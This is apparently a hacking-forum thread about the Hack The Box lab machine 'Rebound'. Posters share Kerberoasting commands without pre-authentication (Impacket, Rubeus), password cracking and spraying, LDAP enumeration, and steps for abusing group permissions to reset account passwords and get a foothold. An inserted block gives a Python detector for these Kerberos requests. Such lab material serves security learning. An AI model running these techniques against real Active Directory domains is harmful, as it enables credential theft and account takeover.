HTB - Rebound
by HerVelizy - Saturday September 9, 2023 at 07:09 PM
#11
(Sep 10, 2023, 10:00 AM)Whatever911 Wrote: Couldn't find anything that works when trying a few wordlists with crackmapexec..

How did you find the hashes, btw? I mean, for the jjones user?

You can find ldap_monitor password with rockyou
Reply
#12
HerVelizy Wrote:
Whatever911 Wrote: Couldn't find anything that works when trying a few wordlists with crackmapexec..

How did you find the hashes, btw? I mean, for the jjones user?

You can find ldap_monitor password with rockyou

Where did you find the hash for ldap_monitor?
Reply
#13
(Sep 10, 2023, 04:41 PM)pollero Wrote:
(Sep 10, 2023, 02:24 PM)0x410x420x41 Wrote:
(Sep 10, 2023, 01:08 PM)lucius222 Wrote: we could be able to kerberoast, but it's not working for me
https://www.thehacker.recipes/ad/movemen...entication

Yea but you need a list of valid SPNs... i've tried with the most generic ones without success
Edit: i was able to get an SPN but i am still not sure how viable it is..
```
root@3818efcacdb8:~/impacket/examples# python GetUserSPNs.py -no-preauth "jjones" -usersfile "services.txt" -dc-host 10.129.108.163 rebound.htb/ -request
Impacket v0.10.1.dev1+20221010.112219.ea8f2efe - Copyright 2022 SecureAuth Corporation

[-] Principal: cifs/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: cifs/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: srv01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$ldap/dc01$REBOUND.HTB$*ldap/dc01*$52f711156a4f409ddcd49b60$[...]
$krb5tgs$18$ldap/dc01.rebound.htb$REBOUND.HTB$*ldap/dc01.rebound.htb*$4cbf811cb806b7a32e17afbe$[...]

```
Where do you get that impacket version?
 
I have this error:
GetUserSPNs.py: error: unrecognized arguments: -no-preauth rebound.htb/

Same here

GetUserSPNs.py: error: unrecognized arguments: -no-preauth rebound.htb/
Reply
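
Added example, not part of the thread or of any tool named in it: the `-no-preauth` requests in the post above ask the AS exchange for a service ticket directly, so on the domain controller they surface as event 4768 records whose service name is not `krbtgt`, and each wrong SPN guess is a 4768 failure with status 0x7 (KDC_ERR_S_PRINCIPAL_UNKNOWN). The sketch runs that detection over constructed records; the keys follow the 4768 field names, while the source addresses, the allowlist and the threshold are assumptions, and failure auditing for the Kerberos Authentication Service is assumed to be enabled.

```python
from collections import defaultdict

# Constructed 4768 records for illustration (not captured from the box).
EVENTS = [
    {"TargetUserName": "alice", "ServiceName": "krbtgt", "Status": "0x0", "PreAuthType": "2", "IpAddress": "10.10.20.15"},
    {"TargetUserName": "jjones", "ServiceName": "cifs/dc01.rebound.htb", "Status": "0x7", "PreAuthType": "0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jjones", "ServiceName": "cifs/dc01", "Status": "0x7", "PreAuthType": "0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jjones", "ServiceName": "srv01", "Status": "0x7", "PreAuthType": "0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jjones", "ServiceName": "winrm/dc01", "Status": "0x7", "PreAuthType": "0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "jjones", "ServiceName": "ldap/dc01", "Status": "0x0", "PreAuthType": "0", "IpAddress": "10.10.14.5"},
    {"TargetUserName": "bob", "ServiceName": "http/oldapp", "Status": "0x7", "PreAuthType": "2", "IpAddress": "10.10.20.30"},
]

KDC_ERR_S_PRINCIPAL_UNKNOWN = 0x7
SPN_GUESS_THRESHOLD = 3  # assumed: distinct unknown services per (source, account)


def is_normal_as_target(service_name):
    """AS-REQs normally target krbtgt (or kadmin/changepw); allowlist is an assumption."""
    name = service_name.lower()
    return name.split("/")[0] == "krbtgt" or name == "kadmin/changepw"


def detect(events, threshold=SPN_GUESS_THRESHOLD):
    findings = []
    guesses = defaultdict(set)  # (source ip, account) -> unknown service names tried
    for ev in events:
        status = int(ev["Status"], 16)
        key = (ev["IpAddress"], ev["TargetUserName"])
        if status == KDC_ERR_S_PRINCIPAL_UNKNOWN:
            guesses[key].add(ev["ServiceName"].lower())
        elif status == 0 and not is_normal_as_target(ev["ServiceName"]):
            # A successful AS exchange that returned a service ticket instead of a TGT.
            kind = "as-req-service-ticket"
            if ev["PreAuthType"] == "0":
                kind += "-no-preauth"
            findings.append((kind, key[0], key[1], ev["ServiceName"]))
    for (ip, user), services in sorted(guesses.items()):
        if len(services) >= threshold:
            findings.append(("spn-guessing", ip, user, len(services)))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

The account that triggers both findings is the one to fix: re-enable Kerberos pre-authentication on it, and rotate the password of any service account whose ticket was issued this way.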
#14
(Sep 10, 2023, 03:30 PM)WurumDurum Wrote:
HerVelizy Wrote:
Whatever911 Wrote: Couldn't find anything that works when trying a few wordlists with crackmapexec..

How did you find the hashes, btw? I mean, for the jjones user?

You can find ldap_monitor password with rockyou

Where did you find the hash for ldap_monitor?

wine ./Rubeus.exe kerberoast /nopreauth:jjones /domain:rebound.htb /dc:dc01.rebound.htb /spns:/home/vagrant/ctf/HTB/Rebound/users.txt /nowrap
Reply
#15
has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it
Reply
#16
(Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it

I do but didn't find anything interesting. Just that some passwords are regularly changed.

python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k
Reply
#17
(Sep 10, 2023, 06:10 PM)HerVelizy Wrote:
(Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it

I do but didn't find anything interesting. Just that some passwords are regularly changed.

python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k

i'm getting auth errors with this, wtf
can you use crackmapexec ldap with ldap_monitor pass?
Reply
#18
(Sep 10, 2023, 07:20 PM)Whatever911 Wrote:
(Sep 10, 2023, 06:40 PM)lucius222 Wrote:
(Sep 10, 2023, 06:10 PM)HerVelizy Wrote:
(Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it

I do but didn't find anything interesting. Just that some passwords are regularly changed.

python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k

i'm getting auth errors with this, wtf
can you use crackmapexec ldap with ldap_monitor pass?
Did you install all requirements for LDAPmonitor? Does your command work?

└─$ sudo apt-get install build-essential python-dev-is-python3 python3-dev python2.7-dev libldap2-dev libsasl2-dev slapd ldap-utils tox lcov valgrind

└─$ pip install python-ldap   

when i run it with -k i'm getting
ldap3.core.exceptions.LDAPSocketOpenError: invalid server address

without -k
ldap3.core.exceptions.LDAPBindError: automatic bind not successful - invalidCredentials

Also: i tried a password spray and i got another user, but still can't access anything
Reply
#19
(Sep 10, 2023, 10:20 PM)Whatever911 Wrote: Well yes, you need to find that user's hash and crack it, then use its credentials.

But the question remains, what after that? How to proceed towards foothold?

1. Check which user has permissions on a group called ServiceMgmt
2. Abuse those permissions.
2. Check which permissions that group has on another domain object (OU)
3. Abuse permissions on said object to reset the password of some account that can access the server.
4. Foothold secured.

Maybe use a windows vm for those tasks. Powersploit, Powerview are nice to have.
Reply
#20
(Sep 11, 2023, 12:02 AM)zer0 Wrote:
(Sep 10, 2023, 10:20 PM)Whatever911 Wrote: Well yes, you need to find that user's hash and crack it, then use its credentials.

But the question remains, what after that? How to proceed towards foothold?

1. Check which user has permissions on a group called ServiceMgmt
2. Check which permissions that group has on another domain object (OU)
3. Abuse permissions on said object to reset the password of some account that can access the server.
4. Foothold secured.

Maybe use a windows vm for those tasks. Powersploit, Powerview are nice to have.

are the hashes crackable? i've tried the ones retrieved with asreproasting and no success so far
Reply

